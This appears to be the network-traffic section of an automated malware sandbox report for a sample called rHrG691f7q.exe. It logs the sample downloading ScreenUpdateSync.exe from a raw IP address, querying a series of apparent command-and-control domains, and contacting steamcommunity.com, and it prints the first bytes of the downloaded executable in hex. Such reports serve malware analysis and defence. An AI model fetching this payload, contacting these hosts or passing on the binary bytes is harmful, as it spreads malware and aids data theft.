                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.638633013 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.638755083 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.638829947 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.640328884 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.640444040 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.640516043 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.642067909 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.642173052 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.642232895 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.643836021 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.643944979 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.644004107 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.645461082 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.645587921 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.645615101 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.646701097 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.647170067 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.647232056 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.647305012 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.648853064 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.648930073 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.648967981 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.650540113 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.650659084 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.650681019 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.650738001 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.652214050 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.652333021 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.652405977 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.653903008 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.653964996 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.654032946 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.655618906 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.655685902 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.655728102 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.657238007 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.657303095 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.657331944 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.658427000 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.658917904 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.659015894 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.659174919 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.660623074 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.660720110 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.660794973 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.662297010 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.662341118 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.662400961 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.664150000 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.664246082 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.664318085 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.665658951 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.665730953 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.665796995 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.667783022 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.668001890 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.668081999 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.668996096 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.670181990 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:25.914222002 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:25.914330959 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:26.132304907 CET49752443192.168.2.6104.21.22.222
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:26.132345915 CET44349752104.21.22.222192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:26.132782936 CET49752443192.168.2.6104.21.22.222
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:26.133605957 CET49752443192.168.2.6104.21.22.222
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:26.133620024 CET44349752104.21.22.222192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:27.357518911 CET44349752104.21.22.222192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:27.357655048 CET49752443192.168.2.6104.21.22.222
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:27.379201889 CET49752443192.168.2.6104.21.22.222
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:27.379228115 CET44349752104.21.22.222192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:27.379574060 CET44349752104.21.22.222192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:27.436213017 CET49752443192.168.2.6104.21.22.222
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:27.675594091 CET49752443192.168.2.6104.21.22.222
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:27.675594091 CET49752443192.168.2.6104.21.22.222
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:27.675784111 CET44349752104.21.22.222192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:28.405492067 CET44349752104.21.22.222192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:28.405625105 CET44349752104.21.22.222192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:28.405713081 CET49752443192.168.2.6104.21.22.222
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:28.407841921 CET49752443192.168.2.6104.21.22.222
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:28.407864094 CET44349752104.21.22.222192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:28.407941103 CET49752443192.168.2.6104.21.22.222
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:28.407951117 CET44349752104.21.22.222192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:28.632899046 CET49759443192.168.2.6104.21.96.1
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:28.632955074 CET44349759104.21.96.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:28.633052111 CET49759443192.168.2.6104.21.96.1
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:28.633497953 CET49759443192.168.2.6104.21.96.1
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:28.633532047 CET44349759104.21.96.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:29.854480028 CET44349759104.21.96.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:29.854582071 CET49759443192.168.2.6104.21.96.1
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:29.856497049 CET49759443192.168.2.6104.21.96.1
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:29.856507063 CET44349759104.21.96.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:29.856818914 CET44349759104.21.96.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:29.858916044 CET49759443192.168.2.6104.21.96.1
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:29.859009981 CET49759443192.168.2.6104.21.96.1
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:29.859062910 CET44349759104.21.96.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:30.731807947 CET44349759104.21.96.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:30.731897116 CET44349759104.21.96.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:30.731980085 CET49759443192.168.2.6104.21.96.1
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:30.738149881 CET49759443192.168.2.6104.21.96.1
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:30.738169909 CET44349759104.21.96.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:30.738337040 CET49759443192.168.2.6104.21.96.1
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:30.738347054 CET44349759104.21.96.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:32.176217079 CET49768443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:32.176265955 CET4434976823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:32.176362038 CET49768443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:32.176817894 CET49768443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:32.176831007 CET4434976823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:33.573457956 CET4434976823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:33.573527098 CET49768443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:33.575098038 CET49768443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:33.575105906 CET4434976823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:33.575422049 CET4434976823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:33.576730967 CET49768443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:33.623336077 CET4434976823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.423234940 CET4434976823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.423268080 CET4434976823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.423335075 CET49768443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.423361063 CET4434976823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.423384905 CET4434976823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.423402071 CET49768443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.423410892 CET49768443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.423429012 CET49768443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.509589911 CET4434976823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.509670973 CET4434976823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.509671926 CET49768443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.509705067 CET4434976823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.509776115 CET49768443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.541773081 CET4434976823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.541826010 CET4434976823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.541851997 CET49768443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.541872025 CET4434976823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.541918993 CET49768443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.541925907 CET4434976823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.542047977 CET4434976823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.542089939 CET49768443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.568550110 CET49768443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.568583965 CET4434976823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.568598986 CET49768443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.568605900 CET4434976823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:18:06.702718973 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:18:07.041064024 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:18:07.796236992 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:18:09.296180010 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:18:11.978360891 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:18:17.345446110 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:18:28.001127958 CET4972680192.168.2.6176.113.115.19

                                                                                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:16.734160900 CET5779853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:16.967303991 CET53577981.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:25.760174036 CET6385953192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:25.980165958 CET53638591.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:25.984570980 CET6435353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:26.126239061 CET53643531.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:28.412658930 CET5446153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:28.631895065 CET53544611.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:30.739912987 CET4949353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:30.963659048 CET53494931.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:30.999936104 CET5642853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:31.219702005 CET53564281.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:31.222907066 CET5128853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:31.446413040 CET53512881.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:31.448194027 CET6455553192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:31.669308901 CET53645551.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:31.670892954 CET6221453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:31.894764900 CET53622141.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:31.897603035 CET5279653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:32.035258055 CET53527961.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:32.038180113 CET5209553192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:32.175375938 CET53520951.1.1.1192.168.2.6

                                                                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:16.734160900 CET192.168.2.61.1.1.10x793cStandard query (0)post-to-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:25.760174036 CET192.168.2.61.1.1.10xab7cStandard query (0)sordid-snaked.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:25.984570980 CET192.168.2.61.1.1.10x38ddStandard query (0)immureprech.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:28.412658930 CET192.168.2.61.1.1.10xcb78Standard query (0)deafeninggeh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:30.739912987 CET192.168.2.61.1.1.10x2ea3Standard query (0)effecterectz.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:30.999936104 CET192.168.2.61.1.1.10x1750Standard query (0)diffuculttan.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:31.222907066 CET192.168.2.61.1.1.10x621eStandard query (0)debonairnukk.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:31.448194027 CET192.168.2.61.1.1.10xc1dbStandard query (0)wrathful-jammy.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:31.670892954 CET192.168.2.61.1.1.10xe0b6Standard query (0)awake-weaves.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:31.897603035 CET192.168.2.61.1.1.10x6d7bStandard query (0)sordid-snaked.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:32.038180113 CET192.168.2.61.1.1.10x8d7fStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:16.967303991 CET1.1.1.1192.168.2.60x793cNo error (0)post-to-me.com104.21.56.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:16.967303991 CET1.1.1.1192.168.2.60x793cNo error (0)post-to-me.com172.67.179.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:25.980165958 CET1.1.1.1192.168.2.60xab7cName error (3)sordid-snaked.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:26.126239061 CET1.1.1.1192.168.2.60x38ddNo error (0)immureprech.biz104.21.22.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:26.126239061 CET1.1.1.1192.168.2.60x38ddNo error (0)immureprech.biz172.67.207.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:28.631895065 CET1.1.1.1192.168.2.60xcb78No error (0)deafeninggeh.biz104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:28.631895065 CET1.1.1.1192.168.2.60xcb78No error (0)deafeninggeh.biz104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:28.631895065 CET1.1.1.1192.168.2.60xcb78No error (0)deafeninggeh.biz104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:28.631895065 CET1.1.1.1192.168.2.60xcb78No error (0)deafeninggeh.biz104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:28.631895065 CET1.1.1.1192.168.2.60xcb78No error (0)deafeninggeh.biz104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:28.631895065 CET1.1.1.1192.168.2.60xcb78No error (0)deafeninggeh.biz104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:28.631895065 CET1.1.1.1192.168.2.60xcb78No error (0)deafeninggeh.biz104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:30.963659048 CET1.1.1.1192.168.2.60x2ea3Name error (3)effecterectz.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:31.219702005 CET1.1.1.1192.168.2.60x1750Name error (3)diffuculttan.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:31.446413040 CET1.1.1.1192.168.2.60x621eName error (3)debonairnukk.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:31.669308901 CET1.1.1.1192.168.2.60xc1dbName error (3)wrathful-jammy.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:31.894764900 CET1.1.1.1192.168.2.60xe0b6Name error (3)awake-weaves.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:32.035258055 CET1.1.1.1192.168.2.60x6d7bName error (3)sordid-snaked.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:32.175375938 CET1.1.1.1192.168.2.60x8d7fNo error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                  • post-to-me.com
                                                                                                                                                                                                                                                                  • immureprech.biz
                                                                                                                                                                                                                                                                  • deafeninggeh.biz
                                                                                                                                                                                                                                                                  • steamcommunity.com
                                                                                                                                                                                                                                                                  • 176.113.115.19

                                                                                                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  0192.168.2.649726176.113.115.19807476C:\Users\user\Desktop\rHrG691f7q.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:19.343600988 CET85OUTGET /ScreenUpdateSync.exe HTTP/1.1
                                                                                                                                                                                                                                                                  User-Agent: ShareScreen
                                                                                                                                                                                                                                                                  Host: 176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.657592058 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 14 Dec 2024 13:16:20 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                  Last-Modified: Sat, 14 Dec 2024 13:15:01 GMT
                                                                                                                                                                                                                                                                  ETag: "58600-6293abc281063"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Content-Length: 361984
                                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 17 cd 9e a9 53 ac f0 fa 53 ac f0 fa 53 ac f0 fa ee e3 66 fa 52 ac f0 fa 4d fe 74 fa 4d ac f0 fa 4d fe 65 fa 47 ac f0 fa 4d fe 73 fa 3d ac f0 fa 74 6a 8b fa 5a ac f0 fa 53 ac f1 fa 20 ac f0 fa 4d fe 7a fa 52 ac f0 fa 4d fe 64 fa 52 ac f0 fa 4d fe 61 fa 52 ac f0 fa 52 69 63 68 53 ac f0 fa 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e7 de 32 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f8 03 00 00 0e 3f 00 00 00 00 00 5c 18 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 43 00 00 04 00 00 9e c3 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$SSSfRMtMMeGMs=tjZS MzRMdRMaRRichSPEL2e?\@Cl)PB0.textl `.rdataL"$@@.data=@p @.rsrc0B@@
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.657635927 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 25 5c 10 44 00 3b 0d 04 40 44 00 75 02 f3 c3 e9 51 08 00 00 6a 0c 68 50 25 44 00 e8 7b 16 00 00 8b 75 08 85 f6 74 75 83 3d
                                                                                                                                                                                                                                                                  Data Ascii: %\D;@DuQjhP%D{utu=uCjkYeVYEtVPYYE}u7ujWYVj54nDDu"DPY?UQeVEPuu
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658616066 CET1236INData Raw: e8 cf 17 00 00 8b f0 83 c4 0c 85 f6 75 18 39 45 fc 74 13 e8 de 08 00 00 85 c0 74 0a e8 d5 08 00 00 8b 4d fc 89 08 8b c6 5e c9 c3 8b ff 55 8b ec 8b 45 08 56 8b f1 c6 46 0c 00 85 c0 75 63 e8 7e 25 00 00 89 46 08 8b 48 6c 89 0e 8b 48 68 89 4e 04 8b
                                                                                                                                                                                                                                                                  Data Ascii: u9EttM^UEVFuc~%FHlHhN;HDtGDHpu"F;FDtFGDHpuFF@puHpF@F^]U3W;t3f;y9Mp8huM?Ex
